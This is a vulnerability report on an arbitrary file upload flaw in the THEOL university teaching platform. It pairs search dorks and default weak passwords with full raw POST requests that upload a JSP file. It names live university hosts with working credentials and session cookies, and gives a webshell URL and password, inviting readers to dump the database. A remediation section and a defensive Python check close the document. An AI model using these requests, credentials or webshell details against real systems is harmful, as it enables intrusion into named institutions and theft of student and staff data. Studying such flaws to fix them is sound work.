THEOL Network Teaching Integrated Platform: Arbitrary File Upload
An arbitrary file upload exists in one page of the system.
The full name of the system is "THEOL Tsinghua Education Online" Network Teaching Comprehensive Platform, provided by the Institute of Educational Technology of Tsinghua University. It is deployed at most colleges and universities nationwide and is used for course selection, grading, online examinations, etc.
Keywords:
inurl: eol/homepage/common/
or: "Welcome to the integrated network teaching platform"
1. Log on to the system with any account.
Account examples:
teacher
theol_teacher
teacher_p
theol_student
or a student ID found via Baidu
Password examples:
123456
000000
or a student ID found via Baidu
2. The teaching-video upload in the course description accepts arbitrary files.
Page:
http://*/eol/popups/jpkrecord/upload_file.jsp?courseId=*
Its code checks the user's permissions: an ordinary account is refused with an error, and an admin account is subjected to further checks.

if (!um.checkPermission(User.USER_PERM_JPKADMIN_BASIC)
        && (column.getCourse().getCourseRecordOperational() == JPKConstant.COLUMN_OPERATIONAL_FALSE
            || um.getID() != column.getCourse().getInstructorId()))
    throw new JspException("You do not have permission!");
... n lines omitted ...
<form action="<%= um.checkPermission(User.USER_PERM_JPKADMIN_BASIC)
                   ? response.encodeURL("admin_receive.jsp")
                   : response.encodeURL("receive.jsp") %>"
      enctype="multipart/form-data" method="post" name="uploadForm" id="uploadForm">
Now look at receive.jsp, the page the upload form actually posts to:
http://*/eol/popups/jpkrecord/receive.jsp
Its code only checks that the user is a valid (basic) user, and the file-extension allow-list is, inexplicably, commented out:

<%
UserManager um = (UserManager) session.getAttribute("um");
if (!um.checkPermission(User.USER_PERM_USER_BASIC))
    throw new JspException("You do not have permission!");
%>
... omitted ...
// fu.setAllowFiles(".txt;.jpg;.bmp;.rm;.rmvb;.htm;.exe;.avi");
An account that can log on normally has permission value 4098 (status value 4098), which is enough to pass this check.
For details, refer to the following class (the path may differ between versions):
eol/web/WEB-INF/classes/net/theol/projects/eol2004/user.class
That is, after logging on with any account that is allowed to log on, the following data can be POSTed directly to the server. Replace each "*" with the corresponding value.

POST http://*/eol/popups/jpkrecord/receive.jsp HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://*/eol/popups/jpkrecord/upload_file.jsp?columnId=7262
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: multipart/form-data; boundary=---------------------------7de1fc3b1c0c26
Accept-Encoding: gzip, deflate
Host: *
Content-Length: 420
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=*; helpperm=95

-----------------------------7de1fc3b1c0c26
Content-Disposition: form-data; name="rd"

columnId=7262
-----------------------------7de1fc3b1c0c26
Content-Disposition: form-data; name="fileid"; filename="1.jsp"
Content-Type: application/octet-stream

test
-----------------------------7de1fc3b1c0c26
Content-Disposition: form-data; name="addFile"

?? ??
-----------------------------7de1fc3b1c0c26--
Taking Donghua University of Technology as an example (theol_student/123456):
http://eol.ecit.cn/eol/homepage/common/opencourse/
The uploaded file is then reachable at:
http://eol.ecit.cn/eol/data/jpk/0/1.jsp

POST http://eol.ecit.cn/eol/popups/jpkrecord/receive.jsp HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://eol.ecit.cn/eol/popups/jpkrecord/upload_file.jsp?columnId=7262
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: multipart/form-data; boundary=---------------------------7de1fc3b1c0c26
Accept-Encoding: gzip, deflate
Host: eol.ecit.cn
Content-Length: 410
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=A95906ABE55FCFDB9CAAFC5FB538181F.T5; JSESSIONID=6DA317CE3259325E42057DBCF09825C3.T5; helpperm=95

-----------------------------7de1fc3b1c0c26
Content-Disposition: form-data; name="rd"

columnId=7262
-----------------------------7de1fc3b1c0c26
Content-Disposition: form-data; name="fileid"; filename="1.jsp"
Content-Type: application/octet-stream

test
-----------------------------7de1fc3b1c0c26
Content-Disposition: form-data; name="addFile"

?? ??
-----------------------------7de1fc3b1c0c26--
Chopper (webshell) connection:
http://eol.ecit.cn/eol/data/jpk/0/2.jsp (sqzr)
Dumping the database from there is left to the reader.
The following case can also be reproduced:
Xiamen University, course.xmu.edu.cn (theol_teacher/123456):
http://course.xmu.edu.cn/meol/data/jpk/0/wooyun.jsp
Note: the uploaded webshell only responds normally when accessed via POST.
Solution:
Filter the file types accepted by the upload, eliminate the weak passwords, and stop storing passwords in plain text in the EOL_USER table.
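For the two server-side checks that receive.jsp is missing (the admin-or-instructor rule that upload_file.jsp enforces only on the form page, and the commented-out extension allow-list), here is an added illustration in Python. It is not THEOL's code; the permission bits, the allow-list contents and all function names are hypothetical stand-ins for User.USER_PERM_* and fu.setAllowFiles().

```python
# Added illustration, not THEOL's code: the two server-side checks that
# receive.jsp omits, written as plain Python. The permission bits and the
# allow-list are hypothetical stand-ins for User.USER_PERM_* and the
# commented-out fu.setAllowFiles() call shown above.
import os
import re
from typing import Optional, Tuple

PERM_USER_BASIC = 1 << 0       # assumed bit: any account that can log on
PERM_JPKADMIN_BASIC = 1 << 8   # assumed bit: course-site administrator

# Server-executable types (.jsp, .htm, .exe) are deliberately absent; the
# original commented-out list would still have allowed .htm and .exe.
ALLOWED_EXTENSIONS = {".txt", ".jpg", ".bmp", ".rm", ".rmvb", ".avi"}

def safe_filename(name: str) -> Optional[str]:
    """Return the bare filename if its single extension is allow-listed.
    Rejects directory components, NUL bytes, shell metacharacters and
    double extensions such as 'shell.jsp.jpg'."""
    base = os.path.basename(name.replace("\\", "/"))
    if not base or "\x00" in name or not re.fullmatch(r"[A-Za-z0-9._-]+", base):
        return None
    stem, ext = os.path.splitext(base)
    if not stem or "." in stem or ext.lower() not in ALLOWED_EXTENSIONS:
        return None
    return base

def authorize_course_upload(perms: int, user_id: int, instructor_id: int,
                            record_operational: bool) -> bool:
    """The rule upload_file.jsp applies, re-applied on the receiving page:
    admins may always upload; anyone else must hold basic permission, be the
    course instructor, and the course record must be open for editing."""
    if perms & PERM_JPKADMIN_BASIC:
        return True
    if not perms & PERM_USER_BASIC:
        return False
    return record_operational and user_id == instructor_id

def receive(perms: int, user_id: int, instructor_id: int,
            record_operational: bool, filename: str) -> Tuple[Optional[str], Optional[str]]:
    """Return (stored_name, None) on success or (None, reason) on refusal."""
    if not authorize_course_upload(perms, user_id, instructor_id, record_operational):
        return None, "You do not have permission!"
    stored = safe_filename(filename)
    if stored is None:
        return None, "file type not allowed"
    return stored, None
```

With both checks in place, the "1.jsp" upload from the request above is refused on file type even when the caller holds the permission the form page requires.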